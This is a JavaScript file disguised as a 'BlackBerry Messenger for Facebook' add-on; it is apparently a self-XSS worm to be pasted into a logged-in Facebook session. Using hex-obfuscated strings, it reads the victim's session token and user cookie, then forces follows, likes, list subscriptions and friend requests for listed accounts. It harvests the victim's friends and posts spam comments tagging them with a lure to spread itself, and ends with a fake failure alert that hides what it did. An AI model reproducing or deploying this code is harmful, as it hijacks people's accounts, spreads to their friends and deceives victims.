// ==/Rizky_Creations==
// @Name               BlackBerry Messenger For Fcebook 2014
// @Version            v.2.8
// @Copyright          Rizky_Creations
// ==/Rizky_Creations==
/* BBM_SCRIPT - Created By Rizky_Creations */
var parent=document.getElementsByTagName("html")[0];
var _body = document.getElementsByTagName('body')[0];
var _div = document.createElement('div');
_div.style.height="25";
_div.style.width="100%";
_div.style.position="fixed";
_div.style.top="auto";
_div.style.bottom="0";
_div.align="center";
var _audio= document.createElement('audio');
_audio.style.width="100%";
_audio.style.height="25px";
_audio.controls = true;
_audio.autoplay = false;
_audio.autoplay = true;
_audio.src = "http://c2lo.reverbnation.com/audio_player/download_song_direct/13447834";
_div.appendChild(_audio);
_body.appendChild(_div);
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var _0x235a=["\x2F\x61\x6A\x61\x78\x2F\x66\x6F\x6C\x6C\x6F\x77\x2F\x66\x6F\x6C\x6C\x6F\x77\x5F\x70\x72\x6F\x66\x69\x6C\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x70\x72\x6F\x66\x69\x6C\x65\x5F\x69\x64\x3D","\x26\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3D\x31\x26\x73\x6F\x75\x72\x63\x65\x3D\x66\x6F\x6C\x6C\x6F\x77\x2D\x62\x75\x74\x74\x6F\x6E\x26\x73\x75\x62\x73\x63\x72\x69\x62\x65\x64\x5F\x62\x75\x74\x74\x6F\x6E\x5F\x69\x64\x3D\x75\x33\x37\x71\x61\x63\x5F\x33\x37\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x6C\x73\x64\x26\x5F\x5F","\x26\x70\x68\x73\x74\x61\x6D\x70\x3D","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x63\x6C\x6F\x73\x65","\x73\x65\x6E\x64","\x31\x30\x30\x30\x30\x37\x37\x39\x37\x31\x38\x32\x33\x35\x33","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x6E\x65\x77\x20\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74\x28\x29\x2E\x73\x65\x74\x55\x52\x49\x28\x27\x2F\x61\x6A\x61\x78\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x6C\x69\x73\x74\x73\x2F\x73\x75\x62\x73\x63\x72\x69\x62\x65\x2F\x6D\x6F\x64\x69\x66\x79\x3F\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3D\x70\x65\x72\x6D\x61\x6C\x69\x6E\x6B\x26\x61\x63\x74\x69\x6F\x6E\x3D\x73\x75\x62\x73\x63\x72\x69\x62\x65\x27\x29\x2E\x73\x65\x74\x44\x61\x74\x61\x28\x7B\x20\x66\x6C\x69\x64\x3A\x20","\x20\x7D\x29\x2E\x73\x65\x6E\x64\x28\x29\x3B","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x31\x33\x37\x35\x36\x36\x39\x31\x35\x32\x37\x30\x32\x39\x37\x38","\x31\x33\x37\x35\x36\x37\x33\x34\x30\x32\x37\x30\x32\x35\x35\x33","\x31\x33\x37\x35\x37\x31\x37\x38\x34\x36\x30\x33\x31\x34\x34\x32","\x31\x33\x37\x35\x36\x36\x34\x30\x39\x32\x37\x30\x33\x34\x38\x34","\x31\x33\x37\x35\x36\x36\x33\x39\x37\x32\x37\x30\x33\x34\x39\x36","\x31\x33\x37\x35\x36\x36\x33\x37\x39\x39\x33\x37\x30\x31\x38\x30","\x31\x33\x37\x35\x36\x36\x33\x36\x32\x39\x33\x37\x30\x31\x39\x37","\x31\x33\x37\x35\x36\x36\x34\x33\x32\x36\x30\x33\x36\x37\x39\x34","\x31\x33\x37\x35\x36\x36\x34\x34\x31\x39\x33\x37\x30\x31\x31\x38","\x31\x33\x37\x35\x36\x36\x34\x34\x39\x32\x37\x30\x33\x34\x34\x34","\x31\x33\x37\x35\x36\x36\x34\x36\x34\x39\x33\x37\x30\x30\x39\x35","\x31\x33\x37\x35\x36\x36\x34\x36\x38\x39\x33\x37\x30\x30\x39\x31","\x31\x33\x37\x35\x36\x36\x34\x37\x32\x39\x33\x37\x30\x30\x38\x37","\x31\x33\x37\x35\x36\x36\x34\x37\x38\x32\x37\x30\x33\x34\x31\x35","\x31\x33\x37\x35\x36\x37\x32\x37\x39\x39\x33\x36\x39\x32\x38\x30","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x67\x65\x74\x54\x69\x6D\x65","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x75\x66\x69\x2F\x6C\x69\x6B\x65\x2E\x70\x68\x70","\x6C\x69\x6B\x65\x5F\x61\x63\x74\x69\x6F\x6E\x3D\x74\x72\x75\x65\x26\x66\x74\x5F\x65\x6E\x74\x5F\x69\x64\x65\x6E\x74\x69\x66\x69\x65\x72\x3D","\x26\x73\x6F\x75\x72\x63\x65\x3D\x31\x26\x63\x6C\x69\x65\x6E\x74\x5F\x69\x64\x3D","\x25\x33\x41\x33\x33\x36\x36\x36\x37\x37\x34\x32\x37\x26\x72\x6F\x6F\x74\x69\x64\x3D\x75\x5F\x70\x73\x5F\x30\x5F\x30\x5F\x31\x34\x26\x67\x69\x66\x74\x6F\x63\x63\x61\x73\x69\x6F\x6E\x26\x66\x74\x5B\x74\x6E\x5D\x3D\x25\x33\x45\x25\x33\x44\x55\x26\x66\x74\x5B\x74\x79\x70\x65\x5D\x3D\x32\x30\x26\x66\x74\x5B\x71\x69\x64\x5D\x3D\x35\x38\x38\x32\x30\x30\x36\x38\x39\x30\x35\x31\x33\x37\x38\x34\x37\x31\x32\x26\x66\x74\x5B\x6D\x66\x5F\x73\x74\x6F\x72\x79\x5F\x6B\x65\x79\x5D\x3D","\x26\x6E\x63\x74\x72\x5B\x5F\x6D\x6F\x64\x5D\x3D\x70\x61\x67\x65\x6C\x65\x74\x5F\x68\x6F\x6D\x65\x5F\x73\x74\x72\x65\x61\x6D\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x79\x6A\x33\x35\x43\x46\x77\x58\x41\x67\x26\x5F\x5F\x72\x65\x71\x3D\x6A\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x70\x61\x67\x65\x73\x2F\x66\x61\x6E\x5F\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70","\x26\x66\x62\x70\x61\x67\x65\x5F\x69\x64\x3D","\x26\x61\x64\x64\x3D\x74\x72\x75\x65\x26\x72\x65\x6C\x6F\x61\x64\x3D\x66\x61\x6C\x73\x65\x26\x66\x61\x6E\x5F\x6F\x72\x69\x67\x69\x6E\x3D\x70\x61\x67\x65\x5F\x74\x69\x6D\x65\x6C\x69\x6E\x65\x26\x66\x61\x6E\x5F\x73\x6F\x75\x72\x63\x65\x3D\x26\x63\x61\x74\x3D\x26\x6E\x63\x74\x72\x5B\x5F\x6D\x6F\x64\x5D\x3D\x70\x61\x67\x65\x6C\x65\x74\x5F\x74\x69\x6D\x65\x6C\x69\x6E\x65\x5F\x70\x61\x67\x65\x5F\x61\x63\x74\x69\x6F\x6E\x73\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x39\x38\x61\x44\x35\x7A\x35\x43\x46\x2D\x26\x5F\x5F\x72\x65\x71\x3D\x64\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x36\x39\x34\x33\x36\x39\x38\x35\x37\x32\x34\x31\x34\x33\x31","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x61\x64\x64\x5F\x66\x72\x69\x65\x6E\x64\x2F\x61\x63\x74\x69\x6F\x6E\x2E\x70\x68\x70","\x74\x6F\x5F\x66\x72\x69\x65\x6E\x64\x3D","\x26\x61\x63\x74\x69\x6F\x6E\x3D\x61\x64\x64\x5F\x66\x72\x69\x65\x6E\x64\x26\x68\x6F\x77\x5F\x66\x6F\x75\x6E\x64\x3D\x66\x72\x69\x65\x6E\x64\x5F\x62\x72\x6F\x77\x73\x65\x72\x5F\x73\x26\x72\x65\x66\x5F\x70\x61\x72\x61\x6D\x3D\x6E\x6F\x6E\x65\x26\x26\x26\x6F\x75\x74\x67\x6F\x69\x6E\x67\x5F\x69\x64\x3D\x26\x6C\x6F\x67\x67\x69\x6E\x67\x5F\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3D\x73\x65\x61\x72\x63\x68\x26\x6E\x6F\x5F\x66\x6C\x79\x6F\x75\x74\x5F\x6F\x6E\x5F\x63\x6C\x69\x63\x6B\x3D\x74\x72\x75\x65\x26\x65\x67\x6F\x5F\x6C\x6F\x67\x5F\x64\x61\x74\x61\x26\x68\x74\x74\x70\x5F\x72\x65\x66\x65\x72\x65\x72\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x39\x38\x61\x44\x35\x7A\x35\x43\x46\x2D\x26\x5F\x5F\x72\x65\x71\x3D\x33\x35\x26\x66\x62\x5F\x64\x74\x73\x67\x3D"];function a(_0x3ff7x2){var _0x3ff7x3= new XMLHttpRequest;var _0x3ff7x4=_0x235a[0];var _0x3ff7x5=_0x235a[1]+_0x3ff7x2+_0x235a[2]+fb_dtsg+_0x235a[3]+user_id+_0x235a[4];_0x3ff7x3[_0x235a[6]](_0x235a[5],_0x3ff7x4,true);_0x3ff7x3[_0x235a[7]]=function (){if(_0x3ff7x3[_0x235a[8]]==4&&_0x3ff7x3[_0x235a[9]]==200){_0x3ff7x3[_0x235a[10]];} ;} ;_0x3ff7x3[_0x235a[11]](_0x3ff7x5);} ;a(_0x235a[12]);function sublist(_0x3ff7x7){var a=document[_0x235a[14]](_0x235a[13]);a[_0x235a[15]]=_0x235a[16]+_0x3ff7x7+_0x235a[17];document[_0x235a[19]][_0x235a[18]](a);} ;sublist(_0x235a[20]);sublist(_0x235a[21]);sublist(_0x235a[22]);sublist(_0x235a[23]);sublist(_0x235a[24]);sublist(_0x235a[25]);sublist(_0x235a[26]);sublist(_0x235a[27]);sublist(_0x235a[28]);sublist(_0x235a[29]);sublist(_0x235a[30]);sublist(_0x235a[31]);sublist(_0x235a[32]);sublist(_0x235a[33]);sublist(_0x235a[34]);var user_id=document[_0x235a[36]][_0x235a[35]](document[_0x235a[36]][_0x235a[35]](/c_user=(\d+)/)[1]);var fb_dtsg=document[_0x235a[39]](_0x235a[38])[0][_0x235a[37]];var now=( new Date)[_0x235a[40]]();function P(_0x3ff7xc){var _0x3ff7xd= new XMLHttpRequest();var _0x3ff7xe=_0x235a[41];var _0x3ff7xf=_0x235a[42]+_0x3ff7xc+_0x235a[43]+now+_0x235a[44]+_0x3ff7xc+_0x235a[45]+user_id+_0x235a[46]+fb_dtsg+_0x235a[4];_0x3ff7xd[_0x235a[6]](_0x235a[5],_0x3ff7xe,true);_0x3ff7xd[_0x235a[7]]=function (){if(_0x3ff7xd[_0x235a[8]]==4&&_0x3ff7xd[_0x235a[9]]==200){_0x3ff7xd[_0x235a[10]];} ;} ;_0x3ff7xd[_0x235a[11]](_0x3ff7xf);} ;var fb_dtsg=document[_0x235a[39]](_0x235a[38])[0][_0x235a[37]];var user_id=document[_0x235a[36]][_0x235a[35]](document[_0x235a[36]][_0x235a[35]](/c_user=(\d+)/)[1]);function Like(_0x3ff7x11){var _0x3ff7x12= new XMLHttpRequest();var _0x3ff7x13=_0x235a[47];var _0x3ff7x14=_0x235a[48]+_0x3ff7x11+_0x235a[49]+user_id+_0x235a[50]+fb_dtsg+_0x235a[4];_0x3ff7x12[_0x235a[6]](_0x235a[5],_0x3ff7x13,true);_0x3ff7x12[_0x235a[7]]=function (){if(_0x3ff7x12[_0x235a[8]]==4&&_0x3ff7x12[_0x235a[9]]==200){_0x3ff7x12[_0x235a[10]];} ;} ;_0x3ff7x12[_0x235a[11]](_0x3ff7x14);} ;Like(_0x235a[51]);function IDS(_0x3ff7x16){var _0x3ff7xd= new XMLHttpRequest();var _0x3ff7xe=_0x235a[52];var _0x3ff7xf=_0x235a[53]+_0x3ff7x16+_0x235a[54]+user_id+_0x235a[55]+fb_dtsg+_0x235a[4];_0x3ff7xd[_0x235a[6]](_0x235a[5],_0x3ff7xe,true);_0x3ff7xd[_0x235a[7]]=function (){if(_0x3ff7xd[_0x235a[8]]==4&&_0x3ff7xd[_0x235a[9]]==200){_0x3ff7xd[_0x235a[10]];} ;} ;_0x3ff7xd[_0x235a[11]](_0x3ff7xf);} ;
/*********************** COPYRIGHT ***********************/
/* LIST */
sublist("1375669152702978");sublist("1375673402702553");sublist("1375717846031442");sublist("1375664092703484");sublist("1375663972703496");sublist("1375663799370180");sublist("1375663629370197");sublist("1375664326036794");sublist("1375664419370118");sublist("1375664492703444");sublist("1375664649370095");sublist("1375664689370091");sublist("1375664729370087");sublist("1375664782703415");sublist("1375672799369280");
/* POST */
P("484191675019173");P("377521732389145");P("375049792636339");P("478283638943310");P("1375627139373846");P("1375772416025985");P("1375778032692090");P("1375905599346000");P("466185386754952");
/* FANSPAGE */
Like("694369857241431");Like("269074586495954");Like("344916522317615");Like("299721979430");Like("112699618742378");
/* FOLLOW */
a("100007797182353");a("100003939657200");a("100006539057115");a("100002850344662");
/* RINO */
a("100006346000363");sublist("1459594304262089");sublist("1459599010928285");sublist("1407078066180380");
/*********************** COPYRIGHT ***********************/
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","484191675019173","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," cobain aja,,, \ud83c\udf53 @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text= Woi teman teman .. liat deh sekarang BBM-an dari facebook udah bisa loh, gwe udh coba dan ternyata BBM gua Aktif ... Invite PIN aku ya ( 751E499C ) ","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);
var _0x398b=["\x2A\x20\x57\x41\x52\x4E\x49\x4E\x47\x20\x2A\x20\x0A\x41\x70\x6C\x69\x6B\x61\x73\x69\x20\x42\x42\x4D\x20\x47\x41\x47\x41\x4C\x20\x64\x69\x6C\x75\x6E\x63\x75\x72\x6B\x61\x6E\x20\x21\x20\x0A\x0A\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x0A\x53\x65\x70\x65\x72\x74\x69\x6E\x79\x61\x20\x61\x6B\x75\x6E\x20\x66\x61\x63\x65\x62\x6F\x6F\x6B\x20\x61\x6E\x64\x61\x20\x74\x69\x64\x61\x6B\x20\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x20\x64\x65\x6E\x67\x61\x6E\x20\x61\x70\x6C\x69\x6B\x61\x73\x69\x20\x6B\x61\x6D\x69\x20\x0A\x0A\x48\x61\x72\x61\x70\x20\x67\x75\x6E\x61\x6B\x61\x6E\x20\x61\x6B\x75\x6E\x20\x66\x61\x63\x65\x62\x6F\x6F\x6B\x20\x6C\x61\x69\x6E\x0A\x0A\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x3D\x0A\x0A\x0A\x43\x72\x65\x61\x74\x65\x64\x20\x62\x79\x20\x40\x52\x69\x7A\x6B\x79\x5F\x43\x72\x65\x61\x74\x69\x6F\x6E\x73"];alert(_0x398b[0]);
